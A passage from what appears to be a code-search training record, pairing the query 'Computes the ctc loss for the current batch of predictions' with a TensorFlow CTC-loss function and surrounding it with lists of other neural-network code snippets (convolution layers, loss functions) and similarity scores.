tf.nn.convolution(x_squeezed, kernel, padding=padding, strides=strides)\n elif len(kernel.shape) == 3:\n y = tf.nn.conv1d(x_squeezed, kernel, padding=padding, stride=strides[0])\n else:\n raise ValueError()\n return tf.reshape(y, shape=([num_classes, batch_size] +\n y.shape[1:].as_list()))", "def convolve_channels(images, kernel, padding='same', stride=(1, 1)):\n m, image_h, image_w, image_c = images.shape\n kernel_h, kernel_w, kernel_c = kernel.shape\n stride_h, stride_w = stride\n\n if isinstance(padding, tuple):\n padding_h, padding_w = padding\n if padding is 'same':\n padding_h = int(((stride_h * image_h)\n - stride_h + kernel_h - image_h) / 2) + 1\n padding_w = int(((stride_w * image_w)\n - stride_w + kernel_w - image_w) / 2) + 1\n if padding is 'valid':\n padding_h, padding_w = 0, 0\n\n output_h = int(((image_h + (2 * padding_h) - kernel_h) / stride_h) + 1)\n output_w = int(((image_w + (2 * padding_w) - kernel_w) / stride_w) + 1)\n conv_output = np.zeros((m, output_h, output_w))\n\n img_m = np.arange(0, m)\n\n images = np.pad(\n images,\n [(0, 0), (padding_h, padding_h), (padding_w, padding_w), (0, 0)],\n mode='constant',\n constant_values=0)\n\n for i in range(output_h):\n for j in range(output_w):\n s_h = (stride_h)\n s_w = (stride_w)\n multiply = images[\n img_m,\n i*s_h:kernel_h+i*s_h,\n j*s_w:kernel_w+j*s_w]\n conv_output[img_m, i, j] = np.sum(\n np.multiply(multiply, kernel), axis=(1, 2, 3))\n return conv_output", "def _tucker_conv(x,\n filters,\n activation_fn=tf.nn.relu6,\n kernel_size=3,\n input_rank_ratio=0.25,\n output_rank_ratio=0.25,\n strides=1,\n residual=True,\n normalization_op_params=None):\n\n if normalization_op_params is None:\n raise ValueError('Normalization params cannot be `None`')\n\n _, height, width, channels = x.get_shape().as_list()\n shortcut = x\n input_rank = _scale_filters(channels, input_rank_ratio)\n\n x = _conv(x,\n input_rank,\n 1,\n activation_fn=activation_fn,\n normalization_op_params=normalization_op_params)\n output_rank = _scale_filters(filters, output_rank_ratio)\n x = _conv(x,\n output_rank,\n kernel_size,\n strides=strides,\n activation_fn=activation_fn,\n normalization_op_params=normalization_op_params)\n x = _conv(x,\n filters,\n 1,\n activation_fn=tf.identity,\n normalization_op_params=normalization_op_params)\n if residual:\n x = x + shortcut\n return x", "def deterministic_evolution_steps(c, a, K, t, dt, theta_c, c_cutoff,\r\n rate_function, prng=np.random, stochasticity='no'):\r\n # determine next intro event\r\n t_old = t\r\n t_delta = prng.exponential(1.0 / theta_c)\r\n\r\n while t < t_old + t_delta:\r\n # make time step fit next intro event time\r\n if t + dt > t_old + t_delta:\r\n thisdt = t_old + t_delta - t\r\n else:\r\n thisdt = dt\r\n\r\n # adapt rates\r\n birth_c, death_c = rate_function(c, a, K, t)\r\n\r\n # evolve clone sizes in the continuum approximation (deterministic)\r\n if stochasticity == 'linearized': # with birth-death-noise\r\n c += (birth_c - death_c) * c * thisdt + ((birth_c + death_c) * c * thisdt) ** .5 * prng.normal()\r\n else:\r\n c += (birth_c - death_c) * c * thisdt\r\n t += thisdt\r\n\r\n # clones / antigens lower than threshold are zeroed\r\n c[c < c_cutoff] = 0.0\r\n\r\n return c, t_old + t_delta", "def calc_cycle_count(self, time):\n dur = self.get_duration()\n phases = time / dur\n count = int(math.floor(phases))\n\n if not self.enable_loop():\n count = np.clip(count, 0, 1)\n\n return count", "def bottleneck(input_tensor, filters, strides, expansion_factor):\r\n ## part of Fast-SCNN\r\n _, input_height, input_width, input_channels = input_tensor.shape\r\n tensor = Conv2D(filters=input_channels * expansion_factor,\r\n kernel_size=1,\r\n strides=1,\r\n padding=\"same\",\r\n activation=\"relu\")(input_tensor)\r\n tensor = BatchNormalization()(tensor)\r\n tensor = Activation('relu')(tensor)\r\n\r\n tensor = DepthwiseConv2D(kernel_size=3,\r\n strides=strides,\r\n padding=\"same\")(tensor)\r\n tensor = BatchNormalization()(tensor)\r\n tensor = Activation('relu')(tensor)\r\n\r\n tensor = Conv2D(filters=filters,\r\n kernel_size=1,\r\n strides=1,\r\n padding=\"same\")(tensor)\r\n tensor = BatchNormalization()(tensor)\r\n output_tensor = Activation('relu')(tensor)\r\n return output_tensor", "def all_views_conv_layer(input_layer,network_type, layer_name, number_of_filters=32, filter_size=(3, 3), stride=(1, 1),\r\n padding='VALID', biases_initializer=tf.zeros_initializer()):\r\n if network_type == \"CC\":\r\n\r\n\r\n input_l_cc, input_r_cc = input_layer\r\n\r\n #with tf.variable_scope(layer_name + \"_CC\") as cc_cope:\r\n h_l_cc = tf.contrib.layers.convolution2d(inputs=input_l_cc, num_outputs=number_of_filters,\r\n kernel_size=filter_size, stride=stride, padding=padding,\r\n weights_initializer=tf.contrib.layers.xavier_initializer(), biases_initializer=biases_initializer)\r\n h_r_cc = tf.contrib.layers.convolution2d(inputs=input_r_cc, num_outputs=number_of_filters,\r\n kernel_size=filter_size, stride=stride, padding=padding, reuse=False,\r\n weights_initializer=tf.contrib.layers.xavier_initializer(), biases_initializer=biases_initializer)\r\n\r\n\r\n h = (h_l_cc, h_r_cc)\r\n\r\n return h\r\n\r\n else:\r\n input_l_mlo, input_r_mlo = input_layer\r\n\r\n # with tf.variable_scope(layer_name + \"_CC\") as cc_cope:\r\n h_l_mlo = tf.contrib.layers.convolution2d(inputs=input_l_mlo, num_outputs=number_of_filters,\r\n kernel_size=filter_size, stride=stride, padding=padding,\r\n weights_initializer=tf.contrib.layers.xavier_initializer(),\r\n biases_initializer=biases_initializer)\r\n h_r_mlo = tf.contrib.layers.convolution2d(inputs=input_r_mlo, num_outputs=number_of_filters,\r\n kernel_size=filter_size, stride=stride, padding=padding, reuse=False,\r\n weights_initializer=tf.contrib.layers.xavier_initializer(),\r\n biases_initializer=biases_initializer)\r\n\r\n h = (h_l_mlo, h_r_mlo)\r\n\r\n return h", "def conv2d(x, n_filters,\n n_in = 0,\n k_h=5, k_w=5,\n stride_h=2, stride_w=2,\n stddev=0.02,\n activation=lambda x: x,\n bias=False,\n padding='VALID',\n name=\"Conv2D\"):\n with tf.variable_scope(name):\n with tf.name_scope('weights'):\n if(n_in == 0):\n w = tf.get_variable(\n 'w', [k_h, k_w, x.get_shape()[-1], n_filters],\n initializer=tf.contrib.layers.xavier_initializer())\n else:\n w = tf.get_variable(\n 'w', [k_h, k_w, n_in, n_filters],\n initializer=tf.contrib.layers.xavier_initializer())\n variable_summaries(w, name + '/weights')\n with tf.name_scope('conv'): \n conv = tf.nn.conv2d(\n x, w, strides=[1, stride_h, stride_w, 1], padding=padding)\n if bias:\n with tf.name_scope('biases'):\n b = tf.get_variable(\n 'b', [n_filters],\n initializer=tf.contrib.layers.xavier_initializer())\n variable_summaries(b, name + '/bias')\n with tf.name_scope('conv'): \n conv = conv + b\n \n with tf.name_scope('conv'): \n tf.histogram_summary(name + '/conv', conv) \n return conv", "def _conv_block(inputs: \"Layer\",\n filters: int,\n kernel: int or Tuple[int, int],\n strides: int or Tuple[int, int]) -> \"Layer\":\n\n layer = Conv2D(filters, kernel, padding='same', strides=strides)(inputs)\n layer = BatchNormalization()(layer)\n layer = relu6(layer)\n return layer", "def integrated_time(x, c=5):\n if x.ndim != 1:\n raise ValueError(\"invalid shape\")\n\n f = autocorr_1d(x)\n taus = 2.0 * jnp.cumsum(f) - 1.0\n window = auto_window(taus, c)\n return taus[window]", "def forward(self, input):\n\n # Work on each channel separately\n all_features = []\n\n for channel in range(0, self.n_channels):\n input_channel = input[:, :, channel]\n\n # Add a dummy (spatial) dimension for the time convolutions\n # Conv1D format : (batch_size, n_feature_maps, duration)\n input_channel = input_channel.unsqueeze(1)\n\n high = self.all_conv_high[channel](input_channel)\n low = self.all_conv_low[channel](input_channel)\n ap_residual = self.all_residual[channel](input_channel)\n\n # Time convolutions are concatenated along the feature maps axis\n output_channel = torch.cat([\n high,\n low,\n ap_residual\n ], dim=1)\n all_features.append(output_channel)\n\n # Concatenate along the feature maps axis\n all_features = torch.cat(all_features, dim=1)\n\n # Flatten for the Linear layers\n all_features = all_features.view(-1,\n 9 * self.n_channels * 12) # <-- 12: depends of the initial sequence length (100).\n # If you have shorter/longer sequences, you probably do NOT even need to modify the modify the network architecture:\n # resampling your input gesture from T timesteps to 100 timesteps will (surprisingly) probably actually work as well!\n\n # Fully-Connected Layers\n output = self.fc(all_features)\n\n return output", "def forward(self, input):\n\n # Work on each channel separately\n all_features = []\n\n for channel in range(0, self.n_channels):\n input_channel = input[:, :, channel]\n\n # Add a dummy (spatial) dimension for the time convolutions\n # Conv1D format : (batch_size, n_feature_maps, duration)\n input_channel = input_channel.unsqueeze(1)\n\n high = self.all_conv_high[channel](input_channel)\n low = self.all_conv_low[channel](input_channel)\n ap_residual = self.all_residual[channel](input_channel)\n\n # Time convolutions are concatenated along the feature maps axis\n output_channel = torch.cat([\n high,\n low,\n ap_residual\n ], dim=1)\n all_features.append(output_channel)\n\n # Concatenate along the feature maps axis\n all_features = torch.cat(all_features, dim=1)\n # Flatten for the Linear layers\n all_features = all_features.view(-1,\n 9 * self.n_channels * 12) # <-- 12: depends of the initial sequence length (100).\n # If you have shorter/longer sequences, you probably do NOT even need to modify the modify the network architecture:\n # resampling your input gesture from T timesteps to 100 timesteps will (surprisingly) probably actually work as well!\n\n # Fully-Connected Layers\n output = self.fc(all_features)\n\n return output", "def concentration(self, time: float) -> _VectorisedFloat:\n concentration = self.concentration_model.concentration(time)\n for interaction in self.short_range:\n concentration += interaction.short_range_concentration(self.concentration_model, time)\n return concentration", "def tf_conv(x, kernel_size, n_features, stride = 1):\n # input shape\n x_shape = x.get_shape().as_list()\n assert(len(x_shape) == 4)\n x_features = x_shape[3]\n\n # weights and bias\n weight_shape = (kernel_size, kernel_size, x_features, n_features)\n weight_stddev = math.sqrt(2.0 / (kernel_size * kernel_size * n_features))\n weight = tf.Variable(\n tf.random_normal(weight_shape, mean = 0.0, stddev = weight_stddev))\n bias = tf.Variable(tf.zeros((n_features,)))\n\n # operation\n padding = \"SAME\"\n result = tf.nn.conv2d(\n x, weight,\n strides = (1, stride, stride, 1),\n padding = padding)\n result = tf.nn.bias_add(result, bias)\n return result", "def forward(self, x):\n if self.signal_length is None:\n self.signal_length = x.shape[-1]\n self.channels = x.shape[-2]\n self._scales = self.compute_optimal_scales()\n self._kernel = self._build_wavelet_bank()\n\n if self._kernel.is_complex():\n self._kernel_real = self._kernel.real\n self._kernel_imag = self._kernel.imag\n\n x = x.unsqueeze(1)\n\n if self._kernel.is_complex():\n if (\n x.dtype != self._kernel_real.dtype\n or x.device != self._kernel_real.device\n ):\n self._kernel_real = self._kernel_real.to(device=x.device, dtype=x.dtype)\n self._kernel_imag = self._kernel_imag.to(device=x.device, dtype=x.dtype)\n\n output_real = nn.functional.conv2d(\n x, self._kernel_real, padding=1, stride=self.stride\n )\n output_imag = nn.functional.conv2d(\n x, self._kernel_imag, padding=1, stride=self.stride\n )\n output_real = torch.transpose(output_real, 1, 2)\n output_imag = torch.transpose(output_imag, 1, 2)\n\n if self.output_format == \"Magnitude\":\n return torch.sqrt(output_real ** 2 + output_imag ** 2)\n else:\n return torch.stack([output_real, output_imag], -1)\n\n else:\n if x.device != self._kernel.device:\n self._kernel = self._kernel.to(device=x.device, dtype=x.dtype)\n\n output = nn.functional.conv2d(\n x, self._kernel, padding=1, stride=self.stride\n )\n return torch.transpose(output, 1, 2)", "def _conv_bn_layer(cnn_input, filters, kernel_size, strides, layer_id):\n output = tf.keras.layers.Conv2D(\n filters=filters, kernel_size=kernel_size, strides=strides, padding=\"same\",\n activation=\"linear\", name=\"cnn_{}\".format(layer_id))(cnn_input)\n output = tf.keras.layers.BatchNormalization(\n momentum=_MOMENTUM, epsilon=_EPSILON)(output)\n return output", "def Conv2D(\n inputs,\n filters,\n kernel_size,\n strides=(1, 1),\n padding='same',\n data_format='channels_last',\n dilation_rate=(1, 1),\n activation=None,\n use_bias=True,\n kernel_initializer=None,\n bias_initializer=tf.zeros_initializer(),\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n split=1):\n if kernel_initializer is None:\n if get_tf_version_tuple() <= (1, 12):\n kernel_initializer = tf.contrib.layers.variance_scaling_initializer(2.0)\n else:\n kernel_initializer = tf.keras.initializers.VarianceScaling(2.0, distribution='untruncated_normal')\n dilation_rate = shape2d(dilation_rate)\n\n if split == 1 and dilation_rate == [1, 1]:\n # tf.layers.Conv2D has bugs with dilations (https://github.com/tensorflow/tensorflow/issues/26797)\n with rename_get_variable({'kernel': 'W', 'bias': 'b'}):\n layer = tf.layers.Conv2D(\n filters,\n kernel_size,\n strides=strides,\n padding=padding,\n data_format=data_format,\n dilation_rate=dilation_rate,\n activation=activation,\n use_bias=use_bias,\n kernel_initializer=kernel_initializer,\n bias_initializer=bias_initializer,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n activity_regularizer=activity_regularizer,\n _reuse=tf.get_variable_scope().reuse)\n ret = layer.apply(inputs, scope=tf.get_variable_scope())\n ret = tf.identity(ret, name='output')\n\n ret.variables = VariableHolder(W=layer.kernel)\n if use_bias:\n ret.variables.b = layer.bias\n\n # compute the flops of the conv\n in_shape = inputs.get_shape().as_list()\n channel_axis = 3 if data_format == 'channels_last' else 1\n h_dim = 1 if data_format == 'channels_last' else 2\n w_dim = h_dim + 1\n in_channel = in_shape[channel_axis]\n out_channel = filters\n kernel_shape = shape2d(kernel_size)\n stride = shape4d(strides, data_format=data_format)\n flops = 1.0 * in_channel * out_channel * \\\n kernel_shape[0] * kernel_shape[1] / stride[h_dim] / stride[w_dim]\n if in_shape[h_dim] is not None and in_shape[h_dim] > 0:\n flops *= in_shape[h_dim] * in_shape[w_dim]\n ret.info = VariableHolder(flops=flops)\n\n else:\n # group conv implementation\n data_format = get_data_format(data_format, keras_mode=False)\n in_shape = inputs.get_shape().as_list()\n channel_axis = -1 if data_format == 'NHWC' else 1\n in_channel = in_shape[channel_axis]\n assert in_channel is not None, \"[Conv2D] Input cannot have unknown channel!\"\n assert in_channel % split == 0\n\n assert kernel_regularizer is None and bias_regularizer is None and activity_regularizer is None, \\\n \"Not supported by group conv now!\"\n\n out_channel = filters\n assert out_channel % split == 0\n assert dilation_rate == [1, 1] or get_tf_version_tuple() >= (1, 5), 'TF>=1.5 required for dilated conv.'\n\n kernel_shape = shape2d(kernel_size)\n filter_shape = kernel_shape + [in_channel / split, out_channel]\n stride = shape4d(strides, data_format=data_format)\n\n kwargs = dict(data_format=data_format)\n if get_tf_version_tuple() >= (1, 5):\n kwargs['dilations'] = shape4d(dilation_rate, data_format=data_format)\n\n W = tf.get_variable(\n 'W', filter_shape, initializer=kernel_initializer)\n\n if use_bias:\n b = tf.get_variable('b', [out_channel], initializer=bias_initializer)\n\n conv = None\n if get_tf_version_tuple() >= (1, 13):\n try:\n conv = tf.nn.conv2d(inputs, W, stride, padding.upper(), **kwargs)\n except ValueError:\n conv = None\n log_once(\"CUDNN group convolution support is only available with \"\n \"https://github.com/tensorflow/tensorflow/pull/25818 . \"\n \"Will fall back to a loop-based slow implementation instead!\", 'warn')\n if conv is None:\n inputs = tf.split(inputs, split, channel_axis)\n kernels = tf.split(W, split, 3)\n outputs = [tf.nn.conv2d(i, k, stride, padding.upper(), **kwargs)\n for i, k in zip(inputs, kernels)]\n conv = tf.concat(outputs, channel_axis)\n\n if activation is None:\n activation = tf.identity\n ret = activation(tf.nn.bias_add(conv, b, data_format=data_format) if use_bias else conv, name='output')\n\n ret.variables = VariableHolder(W=W)\n if use_bias:\n ret.variables.b = b\n\n h_dim = 1 if data_format == 'NHWC' else 2\n w_dim = h_dim + 1\n flops = 1.0 * in_channel * out_channel * \\\n kernel_shape[0] * kernel_shape[1] / stride[h_dim] / stride[w_dim] / split\n if in_shape[h_dim] is not None and in_shape[h_dim] > 0:\n flops *= in_shape[h_dim] * in_shape[w_dim]\n ret.info = VariableHolder(flops=flops)\n return ret" ]
[ "0.73321956", "0.72471476", "0.60040087", "0.58424336", "0.5774148", "0.57553667", "0.5680954", "0.56687814", "0.5620562", "0.55967027", "0.5519298", "0.5454149", "0.5431821", "0.5431813", "0.54018116", "0.5376901", "0.5364593", "0.5363788", "0.53633916", "0.52863103", "0.5259958", "0.5249676", "0.52386636", "0.5232303", "0.521968", "0.5171477", "0.5161529", "0.5161529", "0.5159964", "0.5159725", "0.5159037", "0.5154911", "0.5154691", "0.51447994", "0.5143702", "0.5135864", "0.5124968", "0.5117611", "0.5111951", "0.5106232", "0.5103339", "0.51033384", "0.50942653", "0.5092065", "0.50908875", "0.5088229", "0.50859565", "0.5078957", "0.5076036", "0.5075087", "0.5071101", "0.5066959", "0.5065676", "0.5061948", "0.50574183", "0.50355333", "0.50344276", "0.5031459", "0.5026389", "0.5014444", "0.50021064", "0.50020087", "0.49954537", "0.49939212", "0.49913174", "0.49861592", "0.49857292", "0.49851897", "0.49813953", "0.49784848", "0.4977237", "0.49690542", "0.49637905", "0.49489185", "0.49457997", "0.49337494", "0.49326307", "0.49324507", "0.49321154", "0.4928102", "0.49225676", "0.49142727", "0.4912051", "0.4911536", "0.49104917", "0.49064633", "0.4903294", "0.49032453", "0.49012288", "0.4899224", "0.4898819", "0.4892954", "0.48870248", "0.4885016", "0.48836285", "0.4882634", "0.48786837", "0.48769826", "0.487656", "0.4875768" ]
0.7509102
0
Computes the ctc loss for the current batch of predictions.
def ctc_loss(label_length, ctc_input_length, labels, probs): label_length = tf.cast(tf.squeeze(label_length), dtype=tf.int32) ctc_input_length = tf.cast(tf.squeeze(ctc_input_length), dtype=tf.int32) sparse_labels = tf.cast(tf.keras.backend.ctc_label_dense_to_sparse(labels, label_length), dtype=tf.int32) y_pred = tf.log(tf.transpose(probs, perm=[1, 0, 2]) + tf.keras.backend.epsilon()) return tf.expand_dims(tf.nn.ctc_loss(labels=sparse_labels, inputs=y_pred, sequence_length=ctc_input_length), axis=1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_objectives(self, predictions, batch, stage):\n\n p_ctc, wav_lens = predictions\n\n ids = batch.id\n tokens_eos, tokens_eos_lens = batch.tokens_eos\n tokens, tokens_lens = batch.tokens\n\n loss = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens)\n\n if stage != sb.Stage.TRAIN:\n # Decode token terms to words\n sequence = sb.decoders.ctc_greedy_decode(\n p_ctc, wav_lens, blank_id=self.hparams.blank_index\n )\n\n predicted_words = self.tokenizer(sequence, task=\"decode_from_list\")\n\n # Convert indices to words\n target_words = undo_padding(tokens, tokens_lens)\n target_words = self.tokenizer(target_words, task=\"decode_from_list\")\n\n self.wer_metric.append(ids, predicted_words, target_words)\n self.cer_metric.append(ids, predicted_words, target_words)\n\n return loss", "def ctc_loss(input, target, padding_mask=-1, reduction='mean'):\n return FunctionLib.apply(\n 'CTCLoss', input.device, [input, target],\n padding_mask=padding_mask, reduction=reduction.upper())", "def ctc_loss(inputs, padding_mask=-1, **kwargs):\n args = ArgHelper.parse(locals())\n inputs[0] = activation_ops.softmax(inputs[0], axis=2)\n op_lib = loss_ops_lib.Operator\n if context.executing_eagerly():\n raise NotImplementedError\n else:\n return op_lib.blend('CTCLoss', **args)", "def _add_mxnet_ctc_loss(pred, seq_len, label):\n pred_ctc = mx.sym.Reshape(data=pred, shape=(-4, seq_len, -1, 0))\n\n loss = mx.sym.contrib.ctc_loss(data=pred_ctc, label=label)\n ctc_loss = mx.sym.MakeLoss(loss)\n\n softmax_class = mx.symbol.SoftmaxActivation(data=pred)\n softmax_loss = mx.sym.MakeLoss(softmax_class)\n softmax_loss = mx.sym.BlockGrad(softmax_loss)\n return mx.sym.Group([softmax_loss, ctc_loss])", "def compute_ctc_loss(self, logits, target):\n\n num_time_steps = logits.shape[0]\n num_labels = logits.shape[1] - 1\n num_labels_with_blank = num_labels + 1\n\n # sanity check to ensure targets are all right\n assert (target < num_labels).all()\n\n\t\t######################\n\t\t### YOUR CODE HERE ###\n\t\t######################\n target_length = 2 * target.shape[0] + 1\n\n normalized_logits = softmax(logits)\n alpha = self.compute_forward_variables(normalized_logits, target) \n \n return -np.log(np.sum(alpha[target_length-1, :] \\\n + alpha[target_length - 2, :], axis=0))", "def calculate_ctc_loss(label_length, ctc_input_length, labels, logits):\n ctc_input_length = tf.to_int32(ctc_input_length)\n sparse_labels = transfer2sparse(label_length, labels)\n return tf.reduce_mean(tf.nn.ctc_loss(labels=sparse_labels, inputs=logits, sequence_length=ctc_input_length))", "def _add_ctc_loss(pred, seq_len, num_label, loss_type):\n label = mx.sym.Variable('label')\n if loss_type == 'warpctc':\n print(\"Using WarpCTC Loss\")\n sm = _add_warp_ctc_loss(pred, seq_len, num_label, label)\n else:\n print(\"Using MXNet CTC Loss\")\n assert loss_type == 'ctc'\n sm = _add_mxnet_ctc_loss(pred, seq_len, label)\n return sm", "def compute_ctc_loss(criterion, ip, tgt, tgt_lens):\n ip_lens = torch.full(size=(ip.shape[1],), fill_value=ip.shape[0])\n return criterion(ip, tgt, ip_lens, tgt_lens)", "def compute_C_loss(data):\n c_pred = net(data[\"B\"])\n c_real = torch.argmax(data[\"B_class\"], dim=1)\n\n from torch.autograd import Variable\n loss = nn.CrossEntropyLoss()\n\n loss = loss(c_pred, c_real)\n loss = Variable(loss, requires_grad=True)\n return loss", "def ctc_loss(label_length: tf.Tensor, ctc_input_length: tf.Tensor, labels, logits: tf.Tensor):\n label_length = tf.to_int32(tf.squeeze(label_length))\n ctc_input_length = tf.to_int32(tf.squeeze(ctc_input_length))\n sparse_labels = tf.to_int32(tf.keras.backend.ctc_label_dense_to_sparse(labels, label_length))\n y_pred = tf.log(tf.transpose(logits, perm=[1, 0, 2]) + tf.keras.backend.epsilon())\n\n return tf.expand_dims(\n tf.nn.ctc_loss(labels=sparse_labels, inputs=y_pred, sequence_length=ctc_input_length),\n axis=1)", "def ctc_loss(data=None, label=None, data_lengths=None, label_lengths=None, use_data_lengths=_Null, use_label_lengths=_Null, blank_label=_Null, out=None, name=None, **kwargs):\n return (0,)", "def _add_warp_ctc_loss(pred, seq_len, num_label, label):\n label = mx.sym.Reshape(data=label, shape=(-1,))\n label = mx.sym.Cast(data=label, dtype='int32')\n return mx.sym.WarpCTC(data=pred, label=label, label_length=num_label, input_length=seq_len)", "def loss_calc(pred, label, device):\n # out shape batch_size x channels x h x w -> batch_size x channels x h x w\n # label shape h x w x 1 x batch_size -> batch_size x 1 x h x w\n label = Variable(label.long()).to(device)\n criterion = CrossEntropy2d().to(device)\n\n return criterion(pred, label)", "def replacement_ctc(self, model, target, output):\n\tif model.get_backend().get_name() == 'pytorch':\n\t\tpytest.xfail('Backend \"pytorch\" does not use a CTC loss function.')\n\treturn replacement_ctc.original(self, model, target, output)", "def calc_loss(self, outputs, labels):\n information_loss = self.bottleneck.buffer_capacity.mean() # Taking the mean is equivalent of scaling with 1/K\n cross_entropy = F.cross_entropy(outputs, target=labels)\n total = cross_entropy + self.beta * information_loss\n self.ce_loss.append(cross_entropy.cpu().detach().numpy())\n self.info_loss.append(information_loss.cpu().detach().numpy())\n self.total_loss.append(total.cpu().detach().numpy())\n return total", "def Loss(y,predict,isCE=False):\n if isCE:\n if dataMode == 0:\n return tf.losses.softmax_cross_entropy(y,predict)\n else:\n return tf.losses.softmax_cross_entropy(y[:,:,0],predict[:,:,0]) + tf.losses.softmax_cross_entropy(y[:,:,1],predict[:,:,1]) + tf.losses.softmax_cross_entropy(y[:,:,2],predict[:,:,2])\n else:\n return tf.reduce_mean(tf.square(y - predict))", "def loss_calc(pred, label, device):\r\n # out shape batch_size x channels x h x w -> batch_size x channels x h x w\r\n # label shape h x w x 1 x batch_size -> batch_size x 1 x h x w\r\n label = label.long().to(device)\r\n return cross_entropy_2d(pred, label)", "def compute_objectives(self, predictions, batch, stage):\n\n _, lens = batch.sig\n spkid, _ = batch.key_encoded\n\n # Concatenate labels (due to data augmentation)\n if stage == sb.Stage.TRAIN and hasattr(self.modules, \"env_corrupt\"):\n spkid = torch.cat([spkid, spkid], dim=0)\n lens = torch.cat([lens, lens])\n # Compute the cost function\n loss = sb.nnet.losses.bce_loss(predictions, spkid, lens)\n\n # Compute classification error at test time\n if stage != sb.Stage.TRAIN:\n self.error_metrics.append(batch.id, predictions, spkid, lens)\n return loss", "def ci_loss(preds, dtrain):\n # predictions: np.array with shape of (N, )\n n = preds.shape[0]\n y_hat = preds\n\n # labels: np.array with shape of (N, )\n labels = dtrain.get_label().astype('int')\n E = (labels > 0).astype('int')\n T = np.abs(labels)\n\n # Compute the term of concordance index approximation\n loss_num = .0\n loss_den = .0\n for i in np.arange(n):\n if E[i] > 0:\n w = y_hat[i] - y_hat[T[i] < T]\n # For part of denominator and numerator\n loss_den += np.sum(-w)\n loss_num += np.sum((w < _GAMMA) * (-w) * (_GAMMA - w)**2)\n \n loss = 0 if loss_den == 0 else loss_num / loss_den\n\n return \"ci_loss\", loss", "def CELOSS(output,label,delay = 0):\n if delay > 0:\n label.data[delay:,:] = label.data[0:-delay,:]\n label.data[0:delay, :] = -1\n _,predict = torch.max(output,1)\n correct = (predict.data == label.view(-1).data).sum()\n\n #correct = np.sum(predict_data == yt.reshape(-1))\n \n mask = (label>=0)\n output =F.log_softmax(output)\n labselect = label + (label<0).long()\n select = -torch.gather(output,1,labselect.view(-1,1))\n losses = mask.float().cuda().view(-1,1)*select\n loss = torch.sum(losses)/torch.sum(mask.float())\n return loss, correct", "def _compute_loss(self, batch: Dict[str, torch.Tensor]) -> torch.Tensor:\n\n feat_static_cat = batch[\"feat_static_cat\"]\n feat_static_real = batch[\"feat_static_real\"]\n past_time_feat = batch[\"past_time_feat\"]\n past_target = batch[\"past_target\"]\n future_time_feat = batch[\"future_time_feat\"]\n future_target = batch[\"future_target\"]\n past_observed_values = batch[\"past_observed_values\"]\n\n picnn = self.model.picnn\n\n _, scale, hidden_state, _, _ = self.model.unroll_lagged_rnn(\n feat_static_cat,\n feat_static_real,\n past_time_feat,\n past_target,\n past_observed_values,\n future_time_feat,\n future_target,\n )\n\n hidden_state = hidden_state[:, : self.model.context_length]\n\n distr = self.model.output_distribution(picnn, hidden_state, scale)\n\n context_target = past_target[:, -self.model.context_length + 1 :]\n target = torch.cat(\n (context_target, future_target),\n dim=1,\n )\n\n loss_values = self.loss(distr, target)\n\n return loss_values.mean()", "def loss(y_true, y_pred):\n ce = tf.keras.losses.categorical_crossentropy(y_true, y_pred, from_logits=True)\n l2_loss = l2_regularization_loss(model, weight_decay)\n return ce + l2_loss", "def loss(logits, labels, seq_lens):\n # Calculate the average ctc loss across the batch.\n ctc_loss = tf.nn.ctc_loss(inputs=tf.cast(logits, tf.float32),\n labels=labels, sequence_length=seq_lens)\n ctc_loss_mean = tf.reduce_mean(ctc_loss, name='ctc_loss')\n tf.add_to_collection('losses', ctc_loss_mean)\n\n # The total loss is defined as the cross entropy loss plus all\n # of the weight decay terms (L2 loss).\n return tf.add_n(tf.get_collection('losses'), name='total_loss')", "def compute_loss(self):\n self.test_logits = self.compute_logits()\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=self.data.test_labels, logits=self.test_logits)\n cross_entropy_loss = tf.reduce_mean(loss)\n regularization = tf.reduce_sum(\n tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))\n loss = cross_entropy_loss + self.weight_decay * regularization\n return loss", "def custom_loss(y_true, y_pred):\n #print(K.int_shape(y_pred))\n sr = y_pred[:,:,:,0]\n sr_clear = y_pred[:,:,:,1]\n hr = y_true[:,:,:,0]\n hr_clear = y_true[:,:,:,1]\n dim = 384 #K.int_shape(y_pred)[1]\n diff = hr - sr\n denominateur = K.sum(hr_clear, axis=(1,2))\n\n b = K.sum( diff * hr_clear, axis=(1,2))/denominateur #batchsize dim\n #print(K.int_shape(y_pred), K.int_shape(y_pred[:,:,:]))\n b = K.expand_dims(b, axis=-1)\n b = K.expand_dims(b, axis=-1)\n b = K.repeat_elements(b, dim, axis=1 )\n b = K.repeat_elements(b, dim, axis=-1 )\n \n cMSE = K.sum(np.square( (diff-b)*hr_clear), axis=(1,2))/denominateur\n\n #cMSE = K.sum(np.square( (diff)*hr_clear), axis=(1,2))/denominateur\n cPSNR = -10*K.log(cMSE)/K.log(10.0)\n loss1 = 46.5 / cPSNR\n ce = binary_crossentropy(K.reshape(hr_clear, (-1, dim*dim)), K.reshape(sr_clear, (-1, dim*dim)))\n \n #print(K.int_shape(loss1), K.int_shape(ce))\n return loss1 + 0.5*ce", "def crossentropy_loss(y_true, y_pred):\n ce = tf.keras.losses.categorical_crossentropy(y_true, y_pred, from_logits=True) \n return ce", "def compute_objectives(self, predictions, batch, stage):\n (p_ctc, p_seq, asr_p_seq, mt_p_seq, wav_lens, hyps,) = predictions\n\n ids = batch.id\n\n tokens_eos, tokens_eos_lens = batch.tokens_eos\n transcription_eos, transcription_eos_lens = batch.transcription_eos\n transcription_tokens, transcription_lens = batch.transcription_tokens\n\n # loss for different tasks\n # asr loss = ctc_weight * ctc loss + (1 - ctc_weight) * asr attention loss\n # mt loss = mt attention loss\n # st loss =\n # (1 - asr_weight - mt_weight) * st attention loss +\n # asr_weight * asr loss +\n # mt_weight * mt loss\n attention_loss = 0\n asr_ctc_loss = 0\n asr_attention_loss = 0\n mt_loss = 0\n\n # st attention loss\n attention_loss = self.hparams.seq_cost(\n p_seq, tokens_eos, length=tokens_eos_lens,\n )\n\n # asr attention loss\n if self.hparams.ctc_weight < 1 and self.hparams.asr_weight > 0:\n asr_attention_loss = self.hparams.seq_cost(\n asr_p_seq, transcription_eos, length=transcription_eos_lens,\n )\n\n # asr ctc loss\n if self.hparams.ctc_weight > 0 and self.hparams.asr_weight > 0:\n asr_ctc_loss = 